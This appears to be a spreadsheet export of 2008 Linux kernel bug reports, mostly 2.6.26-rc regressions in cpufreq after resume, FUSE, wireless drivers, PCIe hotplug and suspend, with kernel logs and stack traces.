acpi-cpufreq CPUs which need to switch frequency at the same time: 0 hardware limits: 800 MHz - 2.20 GHz available frequency steps: 2.20 GHz, 2.20 GHz, 1.60 GHz, 1.20 GHz, 800 MHz available cpufreq governors: powersave, ondemand, conservative, userspace, performance current policy: frequency should be within 800 MHz and 2.20 GHz. The governor "ondemand" may decide which speed to use within this range. current CPU frequency is 800 MHz. analyzing CPU 1: no or unknown cpufreq driver is active on this CPU At this point, CPU scaling is effectively gone, (stuck in either mode, perhaps now movies will stutter at playback, battery life might go down a lot, cpu-frequency applets go crazy, etc) One "fix" is to rmmod -f acpi_cpufreq &amp;&amp; modprobe acpi_cpufreq but this obviously introduces instability (I have experienced sudden hard lockups), and is otherwise not really a workable solution as most distribution kernels do not support forceful module unloading by default. This has been Ubuntu bug 183033 since January, but it's considered low priority and afaict nobody has made any real effort to find the cause; however it affects many people (everyone with a core 2 duo?), so I decided to report it here. It has been happening with every Ubuntu kernel since at least then, but I just confirmed it with mainline kernel 2.6.26-rc2 without any binary modules or otherwise tainted modules; everything happens exactly the same. /proc/cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 15 model name : Intel(R) Core(TM)2 Duo CPU T7500 @ 2.20GHz stepping : 11 cpu MHz : 800.000 cache size : 4096 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe lm constant_tsc arch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr lahf_lm ida bogomips : 4393.93 clflush size : 64 processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 15 model name : Intel(R) Core(TM)2 Duo CPU T7500 @ 2.20GHz stepping : 11 cpu MHz : 2194.587 cache size : 4096 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr lahf_lm ida bogomips : 4387.19 clflush size : 64 Some additional info can be found at: https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/183033 Additional ACPI info: [ 0.000000] DMI 2.4 present. [ 0.000000] ACPI: RSDP 000FBB00, 0024 (r2 DELL ) [ 0.000000] ACPI: XSDT 7FE5D200, 0064 (r1 DELL M08 27D8021C ASL 61) [ 0.000000] ACPI: FACP 7FE5D09C, 00F4 (r4 DELL M08 27D8021C ASL 61) [ 0.000000] ACPI: DSDT 7FE5D800, 6152 (r2 INT430 SYSFexxx 1001 INTL 20050624) [ 0.000000] ACPI: FACS 7FE6C000, 0040 [ 0.000000] ACPI: HPET 7FE5D300, 0038 (r1 DELL M08 1 ASL 61) [ 0.000000] ACPI: APIC 7FE5D400, 0068 (r1 DELL M08 27D8021C ASL 47) [ 0.000000] ACPI: ASF! 7FE5D000, 007E (r32 DELL M08 27D8021C ASL 61) [ 0.000000] ACPI: MCFG 7FE5D3C0, 003E (r16 DELL M08 27D8021C ASL 61) [ 0.000000] ACPI: TCPA 7FE5D700, 0032 (r1 0 ASL 0) [ 0.000000] ACPI: SLIC 7FE5D49C, 0176 (r1 DELL M08 27D8021C ASL 61) [ 0.000000] ACPI: SSDT 7FE5B9C0, 04CC (r1 PmRef CpuPm 3000 INTL 20050624) [ 0.000000] ACPI: PM-Timer IO Port: 0x1008 [ 0.000000] ACPI: Local APIC address 0xfee00000 [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) [ 0.000000] BIOS bug, APIC version is 0 for CPU#0! fixing up to 0x10. (tell your hw vendor) [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) [ 0.000000] BIOS bug, APIC version is 0 for CPU#0! fixing up to 0x10. (tell your hw vendor) [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) [ 0.000000] ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) [ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) [ 0.000000] ACPI: IRQ0 used by override. [ 0.000000] ACPI: IRQ2 used by override. [ 0.000000] ACPI: IRQ9 used by override. [ 0.000000] Enabling APIC mode: Flat. Using 1 I/O APICs ... [ 0.864975] Setting up standard PCI resources [ 0.864975] ACPI: EC: Look up EC in DSDT [ 0.864975] ACPI: BIOS _OSI(Linux) query ignored [ 0.864975] ACPI: DMI System Vendor: Dell Inc. [ 0.864975] ACPI: DMI Product Name: Latitude D630 [ 0.864975] ACPI: DMI Product Version: [ 0.864975] ACPI: DMI Board Name: [ 0.864975] ACPI: DMI BIOS Vendor: Dell Inc. [ 0.864975] ACPI: DMI BIOS Date: 02/28/2008 [ 0.864975] ACPI: Please send DMI info above to linux-acpi@vger.kernel.org [ 0.864975] ACPI: If "acpi_osi=Linux" works better, please notify linux-acpi@vger.kernel.org [ 0.895022] ACPI: SSDT 7FE6C080, 0043 (r1 LMPWR DELLLOM 1001 INTL 20050624) [ 0.910567] ACPI: Interpreter enabled [ 0.910571] ACPI: (supports S0 S3 S4 S5) [ 0.912626] ACPI: Using IOAPIC for interrupt routing [ 0.985417] ACPI: PCI Root Bridge [PCI0] (0000:00) [ 0.985417] pci 0000:00:1f.0: quirk: region 1000-107f claimed by ICH6 ACPI/GPIO/TCO [ 0.985417] pci 0000:00:1f.0: quirk: region 1080-10bf claimed by ICH6 GPIO [ 0.985417] PCI: Transparent bridge - 0000:00:1e.0 [ 0.985417] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] [ 0.985417] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCIE._PRT] [ 0.985575] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.AGP_._PRT] [ 0.985672] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.RP01._PRT] [ 0.985788] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.RP02._PRT] [ 0.985906] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.RP06._PRT] [ 1.005473] ACPI: PCI Interrupt Link [LNKA] (IRQs 9 10 11) *5 [ 1.005473] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 7) *10 [ 1.005473] ACPI: PCI Interrupt Link [LNKC] (IRQs 9 10 11) *0, disabled. [ 1.005473] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 7 9 10 11) *3 [ 1.005473] ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 9 10 *11 12 14 15) [ 1.005473] ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 9 *10 11 12 14 15) [ 1.005473] ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 *9 10 11 12 14 15) [ 1.005473] ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 9 10 11 12 14 15) *0, disabled. I should also note that "acpi_osi=Linux" breaks resume altogether, so I have not pursued if it works with that options. Steps to reproduce: Suspend-to-RAM. Resume. Observe. Please free to request any more information or tests I can do.</t>
  </si>
  <si>
    <t>BISECTED REGRESSION: 2.6.26-rc2: FUSE changes break mount of ntfs-3g</t>
  </si>
  <si>
    <t>2008-05-18 03:54 UTC</t>
  </si>
  <si>
    <t>2008-05-25 11:29 UTC</t>
  </si>
  <si>
    <t>Miklos Szeredi</t>
  </si>
  <si>
    <t>Subject : BISECTED REGRESSION: 2.6.26-rc2: FUSE changes break mount of ntfs-3g Submitter : "Ioan Ionita" &lt;opslynx@gmail.com&gt; Date : 2008-05-17 20:37 References : http://marc.info/?l=linux-kernel&amp;m=121105669717787&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>REGRESSION: video driver stuck after screen blank</t>
  </si>
  <si>
    <t>2.6.26-rc</t>
  </si>
  <si>
    <t>2008-05-18 04:43 UTC</t>
  </si>
  <si>
    <t>2008-05-19 14:13 UTC</t>
  </si>
  <si>
    <t>Subject : REGRESSION: video driver stuck after screen blank Submitter : Stephen Hemminger &lt;shemminger@vyatta.com&gt; Date : 2008-05-16 21:26 References : http://marc.info/?l=dri-devel&amp;m=121103996227050&amp;w=2 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>dhclient fails to run; capabilities error</t>
  </si>
  <si>
    <t>2008-05-19 06:25 UTC</t>
  </si>
  <si>
    <t>Amit Shah</t>
  </si>
  <si>
    <t>2008-06-13 00:31 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26-rc1 Distribution: Kubuntu Hardy Hardware Environment: AMD Software Environment: Problem Description: On a default Kubuntu Hardy install, I fetched the git tree from Linus; compiled and installed the kernel. This persists even with 2.6.26-rc2+ (commit f26a3988917913b3d11b2bd741601a2c64ab9204) If this isn't known, I'll bisect and report the bad commit Steps to reproduce: 'sudo dhclient eth2' returns drop_privileges: could not keep capabilities: Invalid argument eth2 is an e1000e card.</t>
  </si>
  <si>
    <t>poweroff doesn't - 2.6.26-rc1 regression</t>
  </si>
  <si>
    <t>2.6.26_rc3</t>
  </si>
  <si>
    <t>2008-05-19 09:00 UTC</t>
  </si>
  <si>
    <t>Riccardo Gori</t>
  </si>
  <si>
    <t>2008-06-07 12:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26_rc1 Distribution: Gentoo using vanilla-sources Hardware Environment: MB Asus P4S8X # lspci 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 645xx (rev 02) 00:01.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) 00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS963 [MuTIOL Media IO] (rev 04) 00:02.1 SMBus: Silicon Integrated Systems [SiS] SiS961/2 SMBus Controller 00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] 00:03.0 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 00:03.1 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 00:03.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 0f) 00:03.3 USB Controller: Silicon Integrated Systems [SiS] USB 2.0 Controller 00:04.0 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet (rev 91) 00:0a.0 Multimedia audio controller: C-Media Electronics Inc CM8738 (rev 10) 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon R300 ND [Radeon 9700 Pro] 01:00.1 Display controller: ATI Technologies Inc Radeon R300 [Radeon 9700 Pro] (Secondary) Problem Description: At the end of shutdown sequence I have to press the power button to shut down the computer</t>
  </si>
  <si>
    <t>pciehp probing slow, duplicate kobject_add</t>
  </si>
  <si>
    <t>2.6.26-rc1, 2.6.26-rc2, 2.6.26-rc3</t>
  </si>
  <si>
    <t>2008-05-19 14:26 UTC</t>
  </si>
  <si>
    <t>2008-05-28 00:44 UTC</t>
  </si>
  <si>
    <t>drivers_pci@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26-rc1 Distribution: Debian Hardware Environment: Lenovo Thinkpad R61 (8943-DLG) Software Environment: Problem Description: Since 26rc1, there is a significant delay during pciehp initialization (enumerating the pciehp devices takes about one second each), and it tries to create a sysfs entry twice. (What's more, my iwl3945 has stopped working with 2.6.26, but as it's not a PCIE device I believe the two issues are orthogonal... correct me if I'm wrong.) Attaching two dmesgs (2.6.25 &amp; 2.6.26-rc3).</t>
  </si>
  <si>
    <t>pata_isapnp driver causes the ata layer to go splat</t>
  </si>
  <si>
    <t>2008-05-19 14:46 UTC</t>
  </si>
  <si>
    <t>2008-06-09 08:25 UTC</t>
  </si>
  <si>
    <t>This happens quite a bit based on Fedora 9 feedback, but already happened in 2.6.24 and possibly earlier. http://www.kerneloops.org/search.php?search=bad_io_access shows the basic backtrace: *bad_io_access ioread8 ata_altstatus ata_std_dev_select ata_dev_select ata_qc_issue_prot ata_qc_issue ata_exec_internal_sg ata_exec_internal ata_dev_read_id ata_eh_recover ata_do_eh ata_bmdma_drive_eh ata_bmdma_error_handler ata_scsi_error scsi_error_handler kthread kernel_thread_helper in all cases, this happens while pata_isapnp is being loaded; so it's not unlikely that this driver stomps on some other driver which then goes splat</t>
  </si>
  <si>
    <t>BUG: soft lockup - CPU#0 stuck for 130s!</t>
  </si>
  <si>
    <t>2.6.25.3-18.fc9.x86_64</t>
  </si>
  <si>
    <t>2008-05-19 14:55 UTC</t>
  </si>
  <si>
    <t>2008-10-13 11:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.2-5.fc10.x86_64 (but the bug may be triggered now by fedora-devel userspace changes) Earliest failing kernel version: N/A one-time Distribution: fedora-devel Hardware Environment: AMD X2 on CK804 Software Environment: totem-2.23.2-3.fc9.x86_64 Problem Description: BUG: soft lockup - CPU#0 stuck for 130s! [totem:29381] CPU 0: Pid: 29381, comm: totem Tainted: G M 2.6.25.3-18.fc9.x86_64 #1 RIP: 0010:[&lt;ffffffff8103da1c&gt;] [&lt;ffffffff8103da1c&gt;] run_timer_softirq+0x17e/0x200 RSP: 0018:ffffffff814c1ea0 EFLAGS: 00000282 RAX: ffff81000e889fd8 RBX: ffffffff814c1f00 RCX: ffffffff8837125f RDX: ffffffff814c1ec0 RSI: 0000000000007344 RDI: ffff81007e0d6a88 RBP: ffffffff814c1e20 R08: ffff81007e0d6ac0 R09: 0000000000000000 R10: 00002d6fdb26bbc9 R11: ffffffff814c1e20 R12: ffffffff8100cb16 R13: ffffffff814c1e20 R14: ffff81007e0d6a88 R15: ffff81007e0d6a00 FS: 00000000451e0950(0063) GS:ffffffff813f6000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 00007f631a173000 CR3: 000000004175b000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Call Trace: &lt;IRQ&gt; [&lt;ffffffff81039520&gt;] ? __do_softirq+0x66/0xd3 [&lt;ffffffff8100d06c&gt;] ? call_softirq+0x1c/0x28 [&lt;ffffffff8100e210&gt;] ? do_softirq+0x34/0x72 [&lt;ffffffff81039304&gt;] ? irq_exit+0x3f/0x80 [&lt;ffffffff8101bf7a&gt;] ? smp_apic_timer_interrupt+0x8a/0xa3 [&lt;ffffffff8100cb16&gt;] ? apic_timer_interrupt+0x66/0x70 &lt;EOI&gt; [&lt;ffffffff81292430&gt;] ? _spin_unlock_irqrestore+0x8/0xa [&lt;ffffffff81080eae&gt;] ? release_pages+0x16a/0x1de [&lt;ffffffff81091757&gt;] ? free_pages_and_swap_cache+0x7b/0x9b [&lt;ffffffff8108785d&gt;] ? zap_page_range+0xd7/0xf0 [&lt;ffffffff81085f7a&gt;] ? sys_madvise+0x3e6/0x4dc [&lt;ffffffff8106d66b&gt;] ? audit_syscall_entry+0x126/0x15a [&lt;ffffffff8106d33c&gt;] ? audit_syscall_exit+0x331/0x353 [&lt;ffffffff81013073&gt;] ? syscall_trace_enter+0xb5/0xb9 [&lt;ffffffff8100c052&gt;] ? tracesys+0xd5/0xda</t>
  </si>
  <si>
    <t>No Driver for Ralink RT2860 Wireless interface, the source is available on their website</t>
  </si>
  <si>
    <t>2008-05-19 15:38 UTC</t>
  </si>
  <si>
    <t>Bruno Lambert</t>
  </si>
  <si>
    <t>2010-01-19 17:24 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: never Earliest failing kernel version: all Distribution: all, currently Slackware 12.1. Hardware Environment: my laptop, a LG r405 with that wireless card (RT2860) Software Environment: Linux Problem Description: Can't use wireless, need to boot in Windows Vista, wish is painfully slow, ugly and, mostly, not fun to use. Steps to reproduce: Boot into linux. The driver is available on their website: http://www.ralinktech.com/ralink/Home/Support/Linux.html http://www.ralinktech.com.tw/data/drivers/2008_0325_RT2860_Linux_STA_v1.6.1.0.tar.bz2 . I don't know the license issue with that, but I know that the driver compile and work on 2.6.24 (well, need firmware, but that's like with the intel ipw2200 etc...). It would be great to have it directly in the kernel. Thank you, -Bruno Lambert</t>
  </si>
  <si>
    <t>iwl3945 regression - NULL deref in ieee80211_associate</t>
  </si>
  <si>
    <t>2.6.26-rc3</t>
  </si>
  <si>
    <t>2008-05-19 15:56 UTC</t>
  </si>
  <si>
    <t>2008-05-27 16:53 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26-rc2 Earliest failing kernel version: 2.6.26-rc3 Distribution: Debian Hardware Environment: Lenovo Thinkpad R61 (8943-DLG) Software Environment: Problem Description: iwl3945 trying to associate to an AP leads to a kernel oops. The current (2008/05/19) linuxwireless.org compat-wireless driver is affected, too.</t>
  </si>
  <si>
    <t>recent 2.6.26 kernel hangs at suspend</t>
  </si>
  <si>
    <t>2008-05-20 15:49 UTC</t>
  </si>
  <si>
    <t>2008-05-25 11:31 UTC</t>
  </si>
  <si>
    <t>Subject : recent 2.6.26 kernel hangs at suspend Submitter : "Jeff Chua" &lt;jeff.chua.linux@gmail.com&gt; Date : 2008-05-19 15:07 References : http://marc.info/?l=linux-kernel&amp;m=121121007814338&amp;w=2 Handled-By : Len Brown &lt;lenb@kernel.org&gt; Handled-By : Pavel Machek &lt;pavel@suse.cz&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>PCIEHP breakage in 2.6.26-rc1,2.6.26-rc2,2.6.26-rc3</t>
  </si>
  <si>
    <t>2008-05-20 15:52 UTC</t>
  </si>
  <si>
    <t>2008-06-13 14:36 UTC</t>
  </si>
  <si>
    <t>Subject : PCIEHP breakage in 2.6.26-rc1,2.6.26-rc2,2.6.26-rc3 Submitter : "Ryan Hope" &lt;rmh3093@gmail.com&gt; Date : 2008-05-19 17:47 References : http://marc.info/?l=linux-pci&amp;m=121121926401755&amp;w=2 Handled-By : Matthew Wilcox &lt;matthew@wil.cx&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>hackbench regression with 2.6.26-rc2 on tulsa machine</t>
  </si>
  <si>
    <t>2008-05-20 16:00 UTC</t>
  </si>
  <si>
    <t>2008-06-08 09:49 UTC</t>
  </si>
  <si>
    <t>Subject : hackbench regression with 2.6.26-rc2 on tulsa machine Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2008-05-20 8:09 References : http://marc.info/?l=linux-kernel&amp;m=121127121813708&amp;w=2 Handled-By : Mike Galbraith &lt;efault@gmx.de&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ocfs2: rename user_stack{,_ops}</t>
  </si>
  <si>
    <t>2.6.26-rc3-git</t>
  </si>
  <si>
    <t>2008-05-20 16:01 UTC</t>
  </si>
  <si>
    <t>2008-06-03 01:35 UTC</t>
  </si>
  <si>
    <t>Subject : ocfs2: rename user_stack{,_ops} Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/5/20/603 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/5/20/603</t>
  </si>
  <si>
    <t>some serial configurations are now broken</t>
  </si>
  <si>
    <t>Commit b4aa54d951d38d7a989d6b6385494ef5ea7371d7</t>
  </si>
  <si>
    <t>2008-05-20 16:23 UTC</t>
  </si>
  <si>
    <t>2008-06-14 16:08 UTC</t>
  </si>
  <si>
    <t>Subject : b4aa54d951d38d7a989d6b6385494ef5ea7371d7 breaks some serial configurations Submitter : Russell King &lt;rmk+lkml@arm.linux.org.uk&gt; Date : 2008-05-20 7:35 References : http://marc.info/?l=linux-kernel&amp;m=121126931810706&amp;w=2 Handled-By : Javier Herrero &lt;jherrero@hvsistemas.es&gt; Handled-By : Russell King &lt;rmk+lkml@arm.linux.org.uk&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>iwl3945/mac80211: association times out since 2.6.26-rc1</t>
  </si>
  <si>
    <t>2008-05-20 22:46 UTC</t>
  </si>
  <si>
    <t>Michael S. Tsirkin</t>
  </si>
  <si>
    <t>2008-06-10 12:09 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.25-rc1 Distribution: ubuntu dapper, mainline kernel from kernel.org Hardware Environment: thinkpad T60p, wireless card iwl3945 Software Environment: wpa_supplicant version 0.5.4 Problem Description: In all of 2.6.26-rc1, rc2 and rc3, my iwl3945 wifi card can't associate with my +access point. It does associate in 2.6.25. under 2.6.-26-rc[1,2,3] wpa_supplicant reports: Trying to associate with 00:16:e3:ef:5d:f0 (SSID='' freq=0 MHz) Authentication with 00:00:00:00:00:00 timed out. where under 2.6.25 I was associating with Trying to associate with 00:16:e3:ef:5d:f0 (SSID='SIEMENS-EF5DF0' freq=2437 +MHz) Associated with 00:16:e3:ef:5d:f0 WPA: Key negotiation completed with 00:16:e3:ef:5d:f0 [PTK=CCMP GTK=CCMP] I tried bisecting, and I got as far as git-bisect good 4b119e21d0c66c22e8ca03df05d9de623d0eb50f git-bisect bad 96d510566e4908f77f03ff1436c78ae7162a17d0 but a point between these 2 commits gets me iwl driver that hangs kernel when it's loaded, so I gave up on bisecting at this point. Still this leaves us with 91 candidates that might be introducing the regression (get their list with git log 4b119e21d0c66c22e8ca03df05d9de623d0eb50f..96d510566e4908f77f03ff1436c78ae7162a17d0) Additional info: I get this in dmesg [ 99.153033] ACPI: PCI Interrupt 0000:03:00.0[A] -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 99.204031] PM: Adding info for No Bus:iwl-phy1:radio [ 99.204031] Registered led device: iwl-phy1:radio [ 99.204031] PM: Adding info for No Bus:iwl-phy1:assoc [ 99.204031] Registered led device: iwl-phy1:assoc [ 99.204031] PM: Adding info for No Bus:iwl-phy1:RX [ 99.204031] Registered led device: iwl-phy1:RX [ 99.204031] PM: Adding info for No Bus:iwl-phy1:TX [ 99.204031] Registered led device: iwl-phy1:TX [ 99.220405] ADDRCONF(NETDEV_UP): wlan0: link is not ready and even though the led now lights up, there's no association. portions of .config: 2.6.26-rc3: CONFIG_IWLWIFI=m CONFIG_IWLCORE=m # CONFIG_IWLWIFI_LEDS is not set CONFIG_IWLWIFI_RFKILL=y # CONFIG_IWL4965 is not set CONFIG_IWL3945=m CONFIG_IWL3945_SPECTRUM_MEASUREMENT=y CONFIG_IWL3945_LEDS=y CONFIG_IWL3945_DEBUG=y 2.6.25: # CONFIG_IWL4965 is not set CONFIG_IWL3945=m CONFIG_IWL3945_QOS=y CONFIG_IWL3945_SPECTRUM_MEASUREMENT=y CONFIG_IWL3945_DEBUG=y Steps to reproduce: run wpa_cli, look at output</t>
  </si>
  <si>
    <t>[PATCH]kernel crash when i put my pcmcia bluetooth card to notebook</t>
  </si>
  <si>
    <t>Bluetooth</t>
  </si>
  <si>
    <t>2008-05-21 04:54 UTC</t>
  </si>
  <si>
    <t>2010-01-25 16:26 UTC</t>
  </si>
  <si>
    <t>drivers_bluetooth@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Latest working kernel version:about 2.6.20 Earliest failing kernel version: about 2.6.24 Distribution: fedora 9 Hardware Environment: M3N Steps to reproduce: 100% put adapter to slot</t>
  </si>
  <si>
    <t>sched_clock() returns zero because cyc2ns is not initialized</t>
  </si>
  <si>
    <t>2.6.25.4</t>
  </si>
  <si>
    <t>2008-05-22 04:51 UTC</t>
  </si>
  <si>
    <t>Boris Zingerman</t>
  </si>
  <si>
    <t>2008-05-25 15:34 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Hardware Environment: Software Environment: Problem Description: tsc_calibrate() function in tsc_64.c doesn't initialize cyc2ns variable on certain hardware configurations: it returns here if (!hpet &amp;&amp; !pm1 &amp;&amp; !pm2) { printk(KERN_INFO "TSC calibrated against PIT\n"); return; } without executing for_each_possible_cpu(cpu) set_cyc2ns_scale(tsc_khz, cpu); As a result sched_clock() always returns zero. One consequence of this is that lock_stat framework doesn't work, beacuse it uses sched_clock for measuring wait times. Invoking set_cyc2ns_scale before returning solves the problem. Steps to reproduce:</t>
  </si>
  <si>
    <t>Device 'virtio-pci' does not have a release() function</t>
  </si>
  <si>
    <t>2008-05-22 05:14 UTC</t>
  </si>
  <si>
    <t>2010-01-19 18:57 UTC</t>
  </si>
  <si>
    <t>Anthony Liguori</t>
  </si>
  <si>
    <t>Latest working kernel version: - Earliest failing kernel version: iirc, i have already seen this with 2.6.25rc kernels Distribution: opensuse 11 beta Hardware Environment: x86 Software Environment: Problem Description: dmesg: Device 'virtio-pci' does not have a release() function, it is broken and must be fixed. ------------[ cut here ]------------ WARNING: at drivers/base/core.c:119 device_release+0x58/0x5c() Modules linked in: virtio_pci(-) fcrypt pcbc crypto_blkcipher sctp libcrc32c 9pnet_fd 9pnet ts_kmp decnet dccp_ipv6 dccp_ipv4 dccp snd_via82xx gameport snd_ac97_codec ac97_bus snd_mpu401_uart snd_rawmidi snd_seq_dummy snd_seq snd_seq_device sunrpc parkbd sg sr_mod cdrom eni suni zatm uPD98402 atm loop brd lm70 dvb_usb_af9005_remote ovcamchip ov7670 v4l2_common 8250_exar_st16c554 8250_fourport 8250_accent 8250_hub6 8250_boca capifs ppdev parport_pc trm290 sc1200 slc90e66 aec62xx hpt366 cs5520 serverworks rz1000 pdc202xx_old it8213 cmd640 alim15x3 cs5535 via82cxxx ide_pci_generic atiixp amd74xx cmd64x jmicron cs5530 triflex hpt34x ns87415 pdc202xx_new it821x cy82c693 sis5513 piix opti621 siimage ide_generic ide_core ip6t_LOG xt_tcpudp xt_pkttype ipt_LOG xt_limit binfmt_misc af_packet ip6t_REJECT nf_conntrack_ipv6 ipt_REJECT xt_state iptable_filter nf_conntrack_ipv4 nf_conntrack ip_tables ip6table_filter ip6_tables x_tables ipv6 fuse snd_pcm snd_timer snd_page_alloc via_agp e100 parport agpgart mii snd i2c_core soundcore ext3 jbd mbcache sd_mod pata_via libata scsi_mod dock [last unloaded: cfg80211] Pid: 13745, comm: modprobe Tainted: P N 2.6.25.3-2-default #1 [&lt;c01071d9&gt;] dump_trace+0x63/0x227 [&lt;c0107c8a&gt;] show_trace+0x15/0x29 [&lt;c02e6e48&gt;] _etext+0x5b/0x65 [&lt;c0125021&gt;] warn_on_slowpath+0x41/0x67 [&lt;c024abea&gt;] device_release+0x58/0x5c [&lt;c01de888&gt;] kobject_release+0x40/0x50 [&lt;c01df359&gt;] kref_put+0x39/0x44 [&lt;c01de7cb&gt;] kobject_put+0x14/0x16 [&lt;c024a6a9&gt;] put_device+0xf/0x11 [&lt;c024b11c&gt;] device_unregister+0x12/0x15 [&lt;e08313b1&gt;] virtio_pci_exit+0xd/0x19 [virtio_pci] [&lt;c01445a6&gt;] sys_delete_module+0x1a8/0x1e6 [&lt;c01059e4&gt;] sysenter_past_esp+0x6d/0xa9 [&lt;ffffe430&gt;] 0xffffe430 ======================= ---[ end trace cada686c77a474e3 ]--- Steps to reproduce: modprobe virtio-pci, modprobe -r virtio-pci</t>
  </si>
  <si>
    <t>drm_sysfs_suspend uses KERN_ERR in printk</t>
  </si>
  <si>
    <t>2.6.24-16-generic</t>
  </si>
  <si>
    <t>2008-05-23 01:03 UTC</t>
  </si>
  <si>
    <t>Chris Jones</t>
  </si>
  <si>
    <t>2008-09-23 03:50 UTC</t>
  </si>
  <si>
    <t>I am running Ubuntu 8.04's kernel and when I resume from S3 suspend, a single message is displayed on the console about drm_sysfs_suspend, which seems to come from the function: static int drm_sysfs_suspend(struct device *dev, pm_message_t state) This doesn't appear to be an error, so presumably this should be KERN_INFO, not KERN_ERR? (less technical users often express surprise and concern when their laptop comes out of suspend and prints scary messages at them, even if it does actually work fine)</t>
  </si>
  <si>
    <t>kernel will boot with "nohz=off" only</t>
  </si>
  <si>
    <t>2.6.25.4-2-vanilla</t>
  </si>
  <si>
    <t>2008-05-23 01:57 UTC</t>
  </si>
  <si>
    <t>Michael Fischer</t>
  </si>
  <si>
    <t>2010-01-19 17:35 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.25.4-2 Distribution: openSUSE Hardware Environment: AMD ATI SB600 chipset on main board Software Environment: openSUSE 11.0 x64_86 or i386 Problem Description: system goes into black screen - no movement mode somewhen during the boot process. When booting with "nohz=off" everything works just fine. This holds true for x86_64 as well as for i386 kernels on x86_64 hardware and also for i386 kernels on i386 hardware. It is however not distribution dependent, one will run into the same problem using 2.6.24 or later kernels on e.g. ubuntu. Steps to reproduce: reboot the system without "nohz=off", it will get into a hanging state every time</t>
  </si>
  <si>
    <t>(patch queued)ftdi_tiocmget Could not get modem status of device - err: -19</t>
  </si>
